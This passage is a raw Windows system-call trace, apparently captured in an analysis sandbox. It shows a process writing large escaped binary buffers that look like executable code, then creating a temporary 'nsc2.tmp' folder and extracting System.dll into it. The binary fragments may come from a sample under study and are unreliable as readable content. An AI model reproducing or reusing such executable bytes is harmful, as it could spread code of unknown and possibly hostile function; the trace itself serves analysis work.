\301&\4\23B\355\263\344F\34@\247\362\246Q\373\2545\344\231\26\20\312\321\5\260z\326\340\273j\353v\14\10@!\316;\33\241;\221V\344\312\253l\267\326\3242\313\232\3\305Eli\246\35\351V\341\20+\341\260\221\311\222\14~V\357\33\2\320\236ZBX\241\10c\373:NP\341F\337\2452!\251\265b\250py\240\202\275\303\265*SK\242\252\31\21P\365\2\262\317\5\221)W\261Xx#\3KU\264\7\3347r\365\216>n\355$e'\t\322P\346\20\377\264.|\3521\342\177\233\243c\2014q\352\272#\274\326\3621\250D)q\267X\243\242\216\304"\17\334\231e\203\370\223-\273\215x\346\240\206\337.\310\275\225*h\10:9\374\320H\346<\310", ) Y\323\6 \301&\4\23B\355\263\344F\34@\247\362\246Q\373\2545\344\231\26\20\312\321\5\260z\326\340\273j\353v\14\10@!\316;\33\241;\221V\344\312\253l\267\326\3242\313\232\3\305Eli\246\35\351V\341\20+\341\260\221\311\222\14~V\357\33\2\320\236ZBX\241\10c\373:NP\341F\337\2452!\251\265b\250py\240\202\275\303\265*SK\242\252\31\21P\365\2\262\317\5\221)W\261Xx#\3KU\264\7\3347r\365\216>n\355$e'\t\322P\346\20\377\264.|\3521\342\177\233\243c\2014q\352\272#\274\326\3621\250D)q\267X\243\242\216\304 (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "[\215\342\16\306\307=\371^<\313\215x\316a}\231\265\226\14k\354"\311\20\361:\371i\353.kN\216\311\211\220\332\334$\2\352\363\240\177B\230%\320\223m^z\226\231\3#\326\322\313\32K\365'\204o\373O\32\2\223\357$f\214\245\3725\35H\267\362\213H\244{<\372m+\361.F\15gD\305ZC\225\212\311V\266\273\223*\312\207\253&\206D\346\215Ts\25j\336\3664\21\216?\207\27\217m\355$/\377\12\23$\326]!\362f\363K\24683\223_F\302t\341\345c$\248\222\324\206\304\35D\26\22\217!^\374\15\247`\350I&\0p\324\372;"i\364\314Kz\32\15\2S<\207\2643*(\351\243H*\16`\273\207\312\374a\203o&I\0\221\374\312\246\2"7\325\36\7f4\21\4\355\271W\21iQ7\2230\3452\257]\370\10M\216\214\270\223\264\207\346\231"\201\344\320H\361\235\2170\324\300\321\241Wm\4\345Q'.\204\34*\2\362\203\267\367,%\2218"Y\323\6 \301&\4\23B\355\263\344F\34@\247\362\246Q\373\2545\344\231\26\20\312\321\5\260z\326\340\273j\353v\14\10@!\316;\33\241;\221V\344\312\253l\267\326\3242\313\232\3\305Eli\246\35\351V\341\20+\341\260\221\311\222\14~V\357\33\2\320\236ZBX\241\10c\373:NP\341F\337\2452!\251\265b\250py\240\202\275\303\265*SK\242\252\31\21P\365\2\262\317\5\221)W\261Xx#\3KU\264\7\3347r\365\216>n\355$e'\t\322P\346\20\377\264.|\3521\342\177\233\243c\2014q\352\272#\274\326\3621\250D)q\267X\243\242\216\304"\17\334\231e\203\370\223-\273\215x\346\240\206\337.\310\275\225*h\10:9\374\320H\346<\310", ) , ) == 0x0
 00880   456   NtWriteFile  (12, 0, 0, 0,  (12, 0, 0, 0, "\377\377Y\213\306^\302\4\0V\213\361\350\321\377\377\377\366D$\10\1t\7V\350\236\336\377\377Y\213\306^\302\4\0U\213\354\213E\14\203\370\1V\17\205\340\0\0\0\270\224\0\0\0\350\317\364\377\377\213\364V\307\6\224\0\0\0\377\25X\321\1\20\205\300\17\2044\1\0\0\213N\20\211\15hE\2\20\213F\4\243tE\2\20\213V\10\211\25xE\2\20\213v\14\201\346\377\177\0\0\203\371\2\2115lE\2\20t\14\201\316\0\200\0\0\2115lE\2\20\301\340\10\3\302j\1\243pE\2\20\350\35\23\0\0\205\300Y\17\204\340\0\0\0\3505\17\0\0\205\300u\12\350W\23\0\0\351\315\0\0\0\350 I\0\0\377\25\200\321\1\20\243\244]\2\20\350\356G\0\0\243\344C\2\20\350\305B\0\0\205\300|.\3509G\0\0\205\300| \350\375D\0\0\205\300|\27j\0\350-\37\0\0\205\300Yu\13\377\5\340C\2\20\351\222\0\0\0\350\221D\0\0\350\272\14\0\0\353\236\205\300u,9\5\340C\2\20~i\377\15\340C\2\209\5\244E\2\20u\5\3500 \0\0\350fD\0\0\350\217\14\0\0\350\314\22\0\0\353V\203\370\2uDh\214\0\0\0j\1\350\220A\0\0\213\360\205\366YYt,V\3775L1\2\20\377\25\0D\2\20\205\300Vt\24\350u\14\0\0Y\377\25l\320\1\20\203N\4\377\211\6\353\27\350c\343\377\377Y3\300\353\20\203\370\3u\10j\0\350\33\16\0\0Y3\300@\215e\374^]\302\14\0j\14h\270\342\1\20\350\14\1\0\03\300@\211E\344\213u\143\377;\367u\149=\340C\2\20\17\204\263\0\0\0\211}\374;\360t\5\203\376\2u1\241\250]\2\20;\307t\14\377u\20V\377u\10\377\320\211E\3449}\344\17\204\205", 25705, 0x0, 0, ... {status=0x0, info=25705}, ) , 25705, 0x0, 0, ... {status=0x0, info=25705}, ) == 0x0
 00881   456   NtReadFile  (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384},  (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "\327L\37g6k"\366#\345Hx\323/(\214\324Z\276"\211\370sHL\373\17\244\240\374x'\374\301(\262\251/\13:&\211\330\25\22S\361\35\230\201\217\312\270VfU#N\306\343!_\264\6\257\274\203\306[q\327\23|\344\321\361\257\340Z)9\364\255\253\365`\226\321A\257@\247\334\375D\264(\323\213-\226\24\247\250u\206\366\1k\373N\253#-t\365\363%\246y\341\353p;\216;\246F\\273\316q\341%\331\202\15\3\13\201 !\22(\321\245\335|\31I\327\25O\345\202\11\236m8\336K\331x\221^\331S`$9&\24\306J\340\347\236\363\27Q\376\352\206\302\30\346q\233\350\341\214]\32J\273\362\245\3 \372\23\352\333\276k\312\30*\326\362c\361\260z\347\205l\367\331\353\371\306}\276;|\2556\35\26\202Q\247\300T\233\3643^\206\31\20\217[\222\310\362vQ\353\13\23\226\310Y:Bu\21\312\257"\353Cth\205\267.\273\232\227\35\237\340\252\213\375I"5d\340-\232\212>\365\225\340E\257/\223\230.\255{?\323O\215\2\35\34`\364\316{\205\24\315\204\2479\346\244\24592\360j\250\303J\377M\336\320v\21\314\13\216\3504\307\240\2644\347\261e\215\23\372\244#\323v3l\256*3Y\25\314\252&\353-\24\236D\266h\262\305\223m\10\331\364d\13%\333\204\237\370\250\253$\2665\\330m&13\250\233\252\277\275s\6\20\270\277\233\216\302H$\20\20\305\210\210C\307\231\346\357Ma5\307\235\247\3204\233\302\246P,\\322\337\261.\214\222#\376\352\365\3018B\342\35\271\206\337\202\315\12\205\226\355\16\367#", ) \366#\345Hx\323/(\214\324Z\276 (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "\327L\37g6k"\366#\345Hx\323/(\214\324Z\276"\211\370sHL\373\17\244\240\374x'\374\301(\262\251/\13:&\211\330\25\22S\361\35\230\201\217\312\270VfU#N\306\343!_\264\6\257\274\203\306[q\327\23|\344\321\361\257\340Z)9\364\255\253\365`\226\321A\257@\247\334\375D\264(\323\213-\226\24\247\250u\206\366\1k\373N\253#-t\365\363%\246y\341\353p;\216;\246F\\273\316q\341%\331\202\15\3\13\201 !\22(\321\245\335|\31I\327\25O\345\202\11\236m8\336K\331x\221^\331S`$9&\24\306J\340\347\236\363\27Q\376\352\206\302\30\346q\233\350\341\214]\32J\273\362\245\3 \372\23\352\333\276k\312\30*\326\362c\361\260z\347\205l\367\331\353\371\306}\276;|\2556\35\26\202Q\247\300T\233\3643^\206\31\20\217[\222\310\362vQ\353\13\23\226\310Y:Bu\21\312\257"\353Cth\205\267.\273\232\227\35\237\340\252\213\375I"5d\340-\232\212>\365\225\340E\257/\223\230.\255{?\323O\215\2\35\34`\364\316{\205\24\315\204\2479\346\244\24592\360j\250\303J\377M\336\320v\21\314\13\216\3504\307\240\2644\347\261e\215\23\372\244#\323v3l\256*3Y\25\314\252&\353-\24\236D\266h\262\305\223m\10\331\364d\13%\333\204\237\370\250\253$\2665\\330m&13\250\233\252\277\275s\6\20\270\277\233\216\302H$\20\20\305\210\210C\307\231\346\357Ma5\307\235\247\3204\233\302\246P,\\322\337\261.\214\222#\376\352\365\3018B\342\35\271\206\337\202\315\12\205\226\355\16\367#", ) \353Cth\205\267.\273\232\227\35\237\340\252\213\375I (76, 0, 0, 0, 16384, 0x0, 0, ... {status=0x0, info=16384}, "\327L\37g6k"\366#\345Hx\323/(\214\324Z\276"\211\370sHL\373\17\244\240\374x'\374\301(\262\251/\13:&\211\330\25\22S\361\35\230\201\217\312\270VfU#N\306\343!_\264\6\257\274\203\306[q\327\23|\344\321\361\257\340Z)9\364\255\253\365`\226\321A\257@\247\334\375D\264(\323\213-\226\24\247\250u\206\366\1k\373N\253#-t\365\363%\246y\341\353p;\216;\246F\\273\316q\341%\331\202\15\3\13\201 !\22(\321\245\335|\31I\327\25O\345\202\11\236m8\336K\331x\221^\331S`$9&\24\306J\340\347\236\363\27Q\376\352\206\302\30\346q\233\350\341\214]\32J\273\362\245\3 \372\23\352\333\276k\312\30*\326\362c\361\260z\347\205l\367\331\353\371\306}\276;|\2556\35\26\202Q\247\300T\233\3643^\206\31\20\217[\222\310\362vQ\353\13\23\226\310Y:Bu\21\312\257"\353Cth\205\267.\273\232\227\35\237\340\252\213\375I"5d\340-\232\212>\365\225\340E\257/\223\230.\255{?\323O\215\2\35\34`\364\316{\205\24\315\204\2479\346\244\24592\360j\250\303J\377M\336\320v\21\314\13\216\3504\307\240\2644\347\261e\215\23\372\244#\323v3l\256*3Y\25\314\252&\353-\24\236D\266h\262\305\223m\10\331\364d\13%\333\204\237\370\250\253$\2665\\330m&13\250\233\252\277\275s\6\20\270\277\233\216\302H$\20\20\305\210\210C\307\231\346\357Ma5\307\235\247\3204\233\302\246P,\\322\337\261.\214\222#\376\352\365\3018B\342\35\271\206\337\202\315\12\205\226\355\16\367#", ) , ) == 0x0
 00882   456   NtWriteFile  (12, 0, 0, 0,  (12, 0, 0, 0, "3\300\303\314\314U\213\354V3\300PPPPPPPP\213U\14\215I\0\212\2\12\300t\11\203\302\1\17\253\4$\353\361\213u\10\203\311\377\215I\0\203\301\1\212\6\12\300t\11\203\306\1\17\243\4$s\356\213\301\203\304 ^\311\303U\213\3543\300S3\333@9]\14|FVW\205\300t>\213E\14\3\303\231+\302\213\360\213E\10\321\376\215<\360\3777\213E\20\3770\350\235\34\0\0\205\300YYu\12\213M\20\203\307\4\2119\353\13}\6N\211u\14\353\3\215^\1;]\14~\276_^3\311\205\300\17\224\301[\213\301]\303f\201\15hG\2\20\4\1\377\25\4\321\1\20\243pG\2\20\243lG\2\20\303U\213\354\203\354\14\241\141\2\20V\213\361\205\366\211E\374t1\200>\0t,h(\1\2\20V\350[\255\377\377\205\300YYt\33h$\1\2\20V\350J\255\377\377\205\300YYu(j\10\215E\364Pj\13\353\13j\10\215E\364Ph\4\20\0\0\3775pG\2\20\377\25\210G\2\20\205\300t\12\215u\364V\350\344\31\0\0Y\213M\374^\350\14y\377\377\311\3033\300f\213L$\4f;\210D\371\1\20t\13@@\203\370\24r\3533\300@\3033\300\303U\213\354SVWj\323\366_\213]\24\215\47\231+\302\321\370\213\310k\311,\213\211(\363\1\209M\10t%s\5\215x\377\353\3\215p\1;\367~\327S\377u\20\377u\14\377u\10\377\25\344\320\1\20_^[]\302\20\0\213M\14It[IItM\203\351\4t>\203\351\4t/\201\351\366\17\0\0t\34It\16IIu\306k\300,\5L\363\1\20\353, 32597, 0x0, 0, ... {status=0x0, info=32597}, ) , 32597, 0x0, 0, ... {status=0x0, info=32597}, ) == 0x0
 00883   456   NtReadFile  (76, 0, 0, 0, 9619, 0x0, 0, ... {status=0x0, info=9619},  (76, 0, 0, 0, 9619, 0x0, 0, ... {status=0x0, info=9619}, "\7`\37\240\21\320\277I"\314\4\224\3j\1\377\0\274\3p\3B\361\362M,\300\1\250\2\354\2|\16\270\2\210:.\21\364\200\2@%`/\240\31\340\6\204\276\206t\200T\3002@\25`\33\340\10\240\5p\50\346\204DH\1\344\2\312\0\17\2\366\0\232\1W\1\12\274Us;\340A\0T\375\12P\224+@\277\250\0\365\245\2tH\12P\246(@\1\242\0\325\203\335h\22\265\253\355UN\333r_e\274\204\302\302W\31/\241P\370*\343%\24\312^e\274\204B\345\253\214\207P\250\22\315Z\230\375\2106\212\3466\230\244\214e\7L\342\307#\272\335\30\32$\355\351\233\177\27\343\320\367\324\375{\216s\312/Nn\17q\30\315\23\351\230\7?B\374\360jM\2274\333\340\246x\347\375\362\335\327\313\267\245\307|qN\367\22'\376\2308'\210q\251\315.\367\22w\241\30w\3311\336\306+\3044\324\2761a=\247\351\212\367\236\337!\253 \365\37?\4\205aA\3362\344\206\361qS\31\326}\14\366\224\337\244\204\356\3715\370\345\267G\314\257\3717\346\267?\267{~\241\3|\371]\26\363\213\32\360\333\362;}G\367\374r\375\362K\35\300\363+\354\222\337)\261\315[\3046o=\306\361\272\375\30\307\353\237\216q\274\276*\366\5iu\3366\240\347\276\270\256\211\347uC\23\317\353\26\321\255h\342y\231\233x^S\233|y\235\355%\257\271b\332%M>\274\221\207\367\34\267\252\311\207\207s{\211\263C\314o\217_~U\275\304m\24\3436\373\305\335\333K\334V\277o\267\364\22Gh\366\305\351\350%\216\314/\216l`\317ql\307y\271\346\34\367\225+\251\227\270\361\315\342\270\23\315\314f\336\257\363\233y_\24\211\337#\32U6\360\277\33[\243\327w\307\265\243\3}", ) \314\4\224\3j\1\377\0\274\3p\3B\361\362M,\300\1\250\2\354\2|\16\270\2\210:.\21\364\200\2@%`/\240\31\340\6\204\276\206t\200T\3002@\25`\33\340\10\240\5p\50\346\204DH\1\344\2\312\0\17\2\366\0\232\1W\1\12\274Us;\340A\0T\375\12P\224+@\277\250\0\365\245\2tH\12P\246(@\1\242\0\325\203\335h\22\265\253\355UN\333r_e\274\204\302\302W\31/\241P\370*\343%\24\312^e\274\204B\345\253\214\207P\250\22\315Z\230\375\2106\212\3466\230\244\214e\7L\342\307#\272\335\30\32$\355\351\233\177\27\343\320\367\324\375{\216s\312/Nn\17q\30\315\23\351\230\7?B\374\360jM\2274\333\340\246x\347\375\362\335\327\313\267\245\307|qN\367\22'\376\2308'\210q\251\315.\367\22w\241\30w\3311\336\306+\3044\324\2761a=\247\351\212\367\236\337!\253 \365\37?\4\205aA\3362\344\206\361qS\31\326}\14\366\224\337\244\204\356\3715\370\345\267G\314\257\3717\346\267?\267{~\241\3|\371]\26\363\213\32\360\333\362;}G\367\374r\375\362K\35\300\363+\354\222\337)\261\315[\3046o=\306\361\272\375\30\307\353\237\216q\274\276*\366\5iu\3366\240\347\276\270\256\211\347uC\23\317\353\26\321\255h\342y\231\233x^S\233|y\235\355%\257\271b\332%M>\274\221\207\367\34\267\252\311\207\207s{\211\263C\314o\217_~U\275\304m\24\3436\373\305\335\333K\334V\277o\267\364\22Gh\366\305\351\350%\216\314/\216l`\317ql\307y\271\346\34\367\225+\251\227\270\361\315\342\270\23\315\314f\336\257\363\233y_\24\211\337#\32U6\360\277\33[\243\327w\307\265\243\3}", ) == 0x0
 00884   456   NtWriteFile  (12, 0, 0, 0,  (12, 0, 0, 0, "\240\306\1\0\260\306\1\0\300\306\1\0\11\307\1\0R\307\1\0r\307\1\0\210\307\1\0\263\307\1\0\323\307\1\0\350\307\1\0\10\310\1\0(\310\1\0t\310\1\0\200\310\1\0\243\310\1\0\342\310\1\0\373\310\1\0\30\311\1\08\311\1\0f\311\1\0x\311\1\0\254\311\1\0\310\311\1\0\350\311\1\0\10\312\1\0(\312\1\0H\312\1\0k\312\1\0\200\312\1\0\230\312\1\0\303\312\1\0\330\312\1\0\373\312\1\0#\313\1\0F\313\1\0X\313\1\0p\313\1\0\223\313\1\0\250\313\1\0\310\313\1\0\376\313\1\01\314\1\0K\314\1\0\223\314\1\0\270\314\1\0\312\314\1\0\334\314\1\0\356\314\1\0\23\315\1\0%\315\1\0c\315\1\0\177\315\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\377\377\377\377P\305\1\20\0\0\0\0X\305\1\20\1\0\0\0`\305\1\20\2\0\0\0h\305\1\20\3\0\0\0p\305\1\20\4\0\0\0x\305\1\20\5\0\0\0\200\305\1\20\5\0\0\0\210\305\1\20\7\0\0\0\220\305\1\20\7\0\0\0\230\305\1\20\11\0\0\0\240\305\1\20 \5\223\31\13\0\0\0\300\10\2\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\377\377\377\377\262\305\1\20 \5\223\31\1\0\0\04\11\2\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\377\377\377\377\320\305\1\20 \5\223\31\1\0\0\0X\11\2\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0t0\2\20\0\0\0\0\377\377\377\377\0\0\0\0\4\0\0\0\0\0\0\0\1\0\0\0|\11\2\20\0\0\0\0\0\0\0\0\0\0\0\0\230\11\2\20\377\377\377\377\360\305\1\20 \5\223\31\1\0\0\0\260\11\2\20\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 30752, 0x0, 0, ... {status=0x0, info=30752}, ) , 30752, 0x0, 0, ... {status=0x0, info=30752}, ) == 0x0
 00885   456   NtSetInformationFile  (12, 1244488, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 00886   456   NtClose  (12, ... ) == 0x0
 00887   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp"}, 1243668, ... ) }, 1243668, ... ) == 0x0
 00888   456   NtRequestWaitReplyPort  (24, {20, 48, new_msg, 0, 1352280, 0, 0, 0}  (24, {20, 48, new_msg, 0, 1352280, 0, 0, 0} "\0\0\0\0\2\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {20, 48, reply, 0, 452, 456, 1517, 0} "\0\0\0\0\2\0\1\0\2\0\0\0\0\0\0\0\2\0\0\0" )  ... {20, 48, reply, 0, 452, 456, 1517, 0}  (24, {20, 48, new_msg, 0, 1352280, 0, 0, 0} "\0\0\0\0\2\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0" ... {20, 48, reply, 0, 452, 456, 1517, 0} "\0\0\0\0\2\0\1\0\2\0\0\0\0\0\0\0\2\0\0\0" )  ) == 0x0
 00889   456   NtCreateFile  (0x80100080, {24, 0, 0x40, 0, 1243676,  (0x80100080, {24, 0, 0x40, 0, 1243676, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp"}, 0x0, 128, 0, 2, 96, 0, 0, ... 12, {status=0x0, info=2}, ) }, 0x0, 128, 0, 2, 96, 0, 0, ... 12, {status=0x0, info=2}, ) == 0x0
 00890   456   NtClose  (12, ... ) == 0x0
 00891   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00892   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00893   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\"}, 3, 16417, ... 12, {status=0x0, info=1}, ) }, 3, 16417, ... 12, {status=0x0, info=1}, ) == 0x0
 00894   456   NtQueryDirectoryFile  (12, 0, 0, 0, 1242356, 616, BothDirectory, 1,  (12, 0, 0, 0, 1242356, 616, BothDirectory, 1, "nsc2.tmp", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0
 00895   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00896   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00897   456   NtClose  (12, ... ) == 0x0
 00898   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\"}, 3, 16417, ... 12, {status=0x0, info=1}, ) }, 3, 16417, ... 12, {status=0x0, info=1}, ) == 0x0
 00899   456   NtQueryDirectoryFile  (12, 0, 0, 0, 1242392, 616, BothDirectory, 1,  (12, 0, 0, 0, 1242392, 616, BothDirectory, 1, "nsc2.tmp", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0
 00900   456   NtOpenFile  (0x100100, {24, 0, 0x40, 0, 0,  (0x100100, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp"}, 7, 2113568, ... 80, {status=0x0, info=1}, ) }, 7, 2113568, ... 80, {status=0x0, info=1}, ) == 0x0
 00901   456   NtSetInformationFile  (80, 1243620, 40, Basic, ... {status=0x0, info=0}, ) == 0x0
 00902   456   NtClose  (80, ... ) == 0x0
 00903   456   NtOpenFile  (0x10080, {24, 0, 0x40, 0, 0,  (0x10080, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp"}, 7, 2113600, ... 80, {status=0x0, info=1}, ) }, 7, 2113600, ... 80, {status=0x0, info=1}, ) == 0x0
 00904   456   NtQueryInformationFile  (80, 1243688, 8, AttributeFlag, ... ) == STATUS_INVALID_PARAMETER
 00905   456   NtSetInformationFile  (80, 1243739, 1, Disposition, ... {status=0x0, info=0}, ) == 0x0
 00906   456   NtClose  (80, ... ) == 0x0
 00907   456   NtAllocateVirtualMemory  (-1, 1355776, 0, 8192, 4096, 4, ... 1355776, 8192, ) == 0x0
 00908   456   NtQueryDirectoryFile  (12, 0, 0, 0, 1355744, 4096, BothDirectory, 0, 0x0, 0, ... ) == STATUS_NO_MORE_FILES
 00909   456   NtClose  (12, ... ) == 0x0
 00910   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00911   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00912   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\"}, 3, 16417, ... 12, {status=0x0, info=1}, ) }, 3, 16417, ... 12, {status=0x0, info=1}, ) == 0x0
 00913   456   NtQueryDirectoryFile  (12, 0, 0, 0, 1242724, 616, BothDirectory, 1,  (12, 0, 0, 0, 1242724, 616, BothDirectory, 1, "DOCUME~1", 0, ... {status=0x0, info=138}, ) , 0, ... {status=0x0, info=138}, ) == 0x0
 00914   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00915   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00916   456   NtClose  (12, ... ) == 0x0
 00917   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00918   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00919   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\"}, 3, 16417, ... 12, {status=0x0, info=1}, ) }, 3, 16417, ... 12, {status=0x0, info=1}, ) == 0x0
 00920   456   NtQueryDirectoryFile  (12, 0, 0, 0, 1242724, 616, BothDirectory, 1,  (12, 0, 0, 0, 1242724, 616, BothDirectory, 1, "SRI-user", 0, ... {status=0x0, info=110}, ) , 0, ... {status=0x0, info=110}, ) == 0x0
 00921   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00922   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00923   456   NtClose  (12, ... ) == 0x0
 00924   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00925   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00926   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\"}, 3, 16417, ... 12, {status=0x0, info=1}, ) }, 3, 16417, ... 12, {status=0x0, info=1}, ) == 0x0
 00927   456   NtQueryDirectoryFile  (12, 0, 0, 0, 1242724, 616, BothDirectory, 1,  (12, 0, 0, 0, 1242724, 616, BothDirectory, 1, "LOCALS~1", 0, ... {status=0x0, info=122}, ) , 0, ... {status=0x0, info=122}, ) == 0x0
 00928   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00929   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00930   456   NtClose  (12, ... ) == 0x0
 00931   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00932   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00933   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\"}, 3, 16417, ... 12, {status=0x0, info=1}, ) }, 3, 16417, ... 12, {status=0x0, info=1}, ) == 0x0
 00934   456   NtQueryDirectoryFile  (12, 0, 0, 0, 1242724, 616, BothDirectory, 1,  (12, 0, 0, 0, 1242724, 616, BothDirectory, 1, "Temp", 0, ... {status=0x0, info=102}, ) , 0, ... {status=0x0, info=102}, ) == 0x0
 00935   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00936   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00937   456   NtClose  (12, ... ) == 0x0
 00938   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00939   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00940   456   NtOpenFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\"}, 3, 16417, ... 12, {status=0x0, info=1}, ) }, 3, 16417, ... 12, {status=0x0, info=1}, ) == 0x0
 00941   456   NtQueryDirectoryFile  (12, 0, 0, 0, 1242724, 616, BothDirectory, 1,  (12, 0, 0, 0, 1242724, 616, BothDirectory, 1, "nsc2.tmp", 0, ... ) , 0, ... ) == STATUS_NO_SUCH_FILE
 00942   456   NtClose  (12, ... ) == 0x0
 00943   456   NtQueryInformationProcess  (-1, DefaultHardErrorMode, 4, ... {process info, class 12, size 4}, 0x0, ) == 0x0
 00944   456   NtSetInformationProcess  (-1, DefaultHardErrorMode, {process info, class 12, size 4}, 4, ... ) == 0x0
 00945   456   NtCreateFile  (0x100001, {24, 0, 0x40, 0, 0,  (0x100001, {24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp"}, 0x0, 128, 3, 2, 16417, 0, 0, ... 12, {status=0x0, info=2}, ) }, 0x0, 128, 3, 2, 16417, 0, 0, ... 12, {status=0x0, info=2}, ) == 0x0
 00946   456   NtClose  (12, ... ) == 0x0
 00947   456   NtQueryAttributesFile  ({24, 0, 0x40, 0, 0,  ({24, 0, 0x40, 0, 0, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 1244440, ... ) }, 1244440, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 00948   456   NtCreateFile  (0x40100080, {24, 0, 0x40, 0, 1244420,  (0x40100080, {24, 0, 0x40, 0, 1244420, "\??\C:\DOCUME~1\SRI-user\LOCALS~1\Temp\nsc2.tmp\System.dll"}, 0x0, 0, 1, 2, 96, 0, 0, ... 12, {status=0x0, info=2}, ) }, 0x0, 0, 1, 2, 96, 0, 0, ... 12, {status=0x0, info=2}, ) == 0x0
 00949   456   NtSetInformationFile  (76, 1244396, 8, Position, ... {status=0x0, info=0}, ) == 0x0
 00950   456   NtReadFile  (76, 0, 0, 0, 4, 0x0, 0, ... {status=0x0, info=4},  (76, 0, 0, 0, 4, 0x0, 0, ... {status=0x0, info=4}, "\246\26\0\200", ) , ) == 0x0
 00951   456   NtReadFile  (76, 0, 0, 0, 5798, 0x0, 0, ... {status=0x0, info=5798},  (76, 0, 0, 0, 5798, 0x0, 0, ... {status=0x0, info=5798}, "\355:mt\23\327\225#K\226\345\317\21Av\2008\301\4\223\220\360%k,\177 